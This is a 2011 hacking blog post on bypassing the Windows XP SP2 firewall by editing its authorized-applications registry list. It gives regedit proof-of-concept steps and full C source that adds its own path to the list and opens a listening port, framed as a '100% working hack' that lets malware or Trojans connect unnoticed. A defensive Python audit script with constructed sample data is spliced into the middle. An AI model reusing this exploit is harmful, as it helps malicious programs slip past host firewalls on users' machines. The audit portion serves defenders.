Friday, June 3, 2011

How to Bypass Windows XP Firewall using C program

Hello friends, today I will share with you a technique for bypassing the Windows XP Service Pack 2 firewall. It is a 100% working hack, and it is basically an exploit of a weakness in Windows XP.

This technique is nothing but a vulnerability found in the Windows XP SP2 firewall.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a firewall. Direct access to the firewall's registry keys allows a local attacker to bypass the firewall's blocking list and let a malicious program connect to the network.




Credit :-

The information has been provided by Mark Kica.

Vulnerable Systems :-

* Microsoft Windows XP SP2

The Windows XP SP2 firewall keeps its list of allowed programs in the registry, and that list is not properly protected from modification by a malicious local attacker. If an attacker adds a new entry under the registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
the attacker can let his malware or Trojan connect to the Internet without the firewall raising a warning.



Proof of Concept :-

Launch regedit.exe and navigate to the following key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

Add a string (REG_SZ) value such as this one:

Name: C:\chat.exe

Value: C:\chat.exe:*:Enabled:chat
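Each value in this list follows the pattern path:scope:state:name, where the scope `*` means any remote address, the state is Enabled or Disabled, and the last field is the name shown in the firewall's exceptions dialog. From the defender's side, the useful counterpart to the trick above is an audit that reads the list and reports enabled entries that were not in a known-good baseline or that point at programs in user-writable directories. The Python below is an added example, not code from the original post or from Mark Kica: it assumes a text dump in the layout `reg query <key>` prints, and the dump, the baseline and the directory markers it contains are constructed sample data, not output captured from a real machine.

```python
"""Audit the Windows XP SP2 firewall exception list described in the post.

Parses a `reg query`-style dump of the AuthorizedApplications\\List key, splits
each value into its path:scope:state:label fields and reports enabled entries
that are not in a known-good baseline. All data below is constructed sample
input for the example, not output captured from a real machine.
"""
import re
from dataclasses import dataclass

# Key named in the post.
LIST_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
            r"\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List")

# Constructed sample in the layout `reg query <key>` prints: the key line, then
# one "<value name>    REG_SZ    <data>" line per exception.
SAMPLE_DUMP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
    %windir%\system32\sessmgr.exe    REG_SZ    %windir%\system32\sessmgr.exe:*:enabled:Remote Assistance
    C:\Program Files\Messenger\msmsgs.exe    REG_SZ    C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger
    C:\chat.exe    REG_SZ    C:\chat.exe:*:Enabled:chat
    C:\Documents and Settings\user\Local Settings\Temp\svc.exe    REG_SZ    C:\Documents and Settings\user\Local Settings\Temp\svc.exe:*:Enabled:bugg
"""

# Constructed baseline: paths that were present when the machine was known good.
BASELINE = {r"%windir%\system32\sessmgr.exe", r"C:\Program Files\Messenger\msmsgs.exe"}

# Directories a non-admin user can write to; an exception pointing here deserves a look.
USER_WRITABLE_MARKERS = ("\\temp\\", "\\documents and settings\\", "\\local settings\\")

VALUE_LINE = re.compile(r"^\s+(?P<name>.+?)\s+REG_SZ\s+(?P<data>.+?)\s*$")


@dataclass(frozen=True)
class FirewallEntry:
    value_name: str  # registry value name; the post sets it to the program path
    path: str        # program path from the data field
    scope: str       # "*" = any remote address, otherwise a list of addresses/subnets
    state: str       # "Enabled" or "Disabled"
    label: str       # name shown in the Windows Firewall exceptions dialog


def parse_entry(value_name: str, data: str) -> FirewallEntry:
    """Split 'path:scope:state:label'. The path itself contains a colon (drive
    letter), so a naive split on ':' breaks; anchor on the value name when it matches."""
    prefix = value_name + ":"
    if data.startswith(prefix):
        fields = data[len(prefix):].split(":", 2)
        if len(fields) != 3:
            raise ValueError(f"malformed firewall entry: {data!r}")
        return FirewallEntry(value_name, value_name, *fields)
    # Value name and path disagree: take the last three fields from the right.
    fields = data.rsplit(":", 3)
    if len(fields) != 4:
        raise ValueError(f"malformed firewall entry: {data!r}")
    return FirewallEntry(value_name, *fields)


def parse_dump(text: str) -> list[FirewallEntry]:
    """Extract every REG_SZ value line from a `reg query` style dump."""
    entries = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            entries.append(parse_entry(m["name"], m["data"]))
    return entries


def audit(entries, baseline) -> list[tuple[FirewallEntry, list[str]]]:
    """Return (entry, reasons) for every enabled exception that deserves review."""
    known = {p.lower() for p in baseline}
    findings = []
    for e in entries:
        if e.state.lower() != "enabled":
            continue
        reasons = []
        if e.path.lower() not in known:
            reasons.append("not in baseline")
        if e.path.lower() != e.value_name.lower():
            reasons.append("value name and path differ")
        if any(marker in e.path.lower() for marker in USER_WRITABLE_MARKERS):
            reasons.append("program lives in a user-writable directory")
        if reasons and e.scope == "*":
            reasons.append("scope '*' allows any remote address")
        if reasons:
            findings.append((e, reasons))
    return findings


if __name__ == "__main__":
    for entry, reasons in audit(parse_dump(SAMPLE_DUMP), BASELINE):
        print(f"{entry.path} ({entry.label}): {'; '.join(reasons)}")
```

Run against the constructed dump, the two default-looking entries pass and the two added ones are reported; `C:\chat.exe` only because it is new, the Temp entry also because of where the program lives. Comparing against a baseline rather than a hard-coded allow list is what makes this usable across machines with different legitimate exceptions.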


Source Code :-

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <ezsocket.h>   /* socket helper library used by the author; not part of the Windows SDK */
#include <conio.h>
#include "Shlwapi.h"

int main(int argc, char *argv[])
{
    char buffer[1024];
    char filename[1024];
    char rule[1024];
    HKEY hKey;
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    /* Full path of this executable; it doubles as the registry value name. */
    GetModuleFileName(NULL, filename, sizeof(filename));

    /* Build the value data in the format the firewall expects:
       <path>:<scope>:<Enabled|Disabled>:<display name> */
    strcpy(rule, filename);
    strcat(rule, ":*:Enabled:");
    strcat(rule, "bugg");

    /* Open the firewall's list of authorized applications (the key described above). */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                     "SYSTEM\\CurrentControlSet\\Services"
                     "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile"
                     "\\AuthorizedApplications\\List",
                     0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS)
    {
        fprintf(stderr, "RegOpenKeyEx failed\n");
        return 1;
    }

    /* Add this program to the allowed list; REG_SZ data includes the terminating NUL. */
    RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)rule, (DWORD)strlen(rule) + 1);

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
    fprintf(stdout, " This is not trojan \n");
    fprintf(stdout, " Opened port is :2001 \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

    Sleep(3000);   /* Win32 Sleep() takes milliseconds */

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        return 0;

    for (;;)
    {
        /* Remove the entry while waiting for a client and restore it afterwards. */
        RegDeleteValue(hKey, filename);
        fd_size = sizeof(struct sockaddr_in);

        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
        {
            perror("accept");
            continue;
        }

        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sent: Hello World\r\n");

        /* Leave room for the terminator and treat a closed or failed connection as empty input. */
        temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
        if (temp <= 0)
            temp = 0;
        buffer[temp] = '\0';
        fprintf(stdout, "Received: %s\r\n", buffer);

        ezclose_socket(new_fd);
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)rule, (DWORD)strlen(rule) + 1);

        if (!strcmp(buffer, "quit"))
            break;
    }

    RegCloseKey(hKey);
    ezsocket_exit();
    return 0;
}

/* EoF */

The program is easy to follow: all it does is manipulate the registry values described above. It writes its own path into the firewall's allowed-application list, opens a listening socket on port 2001, and removes and re-adds the entry around each accepted connection.

I hope you all liked it. If you have any queries, ask me in the comments.
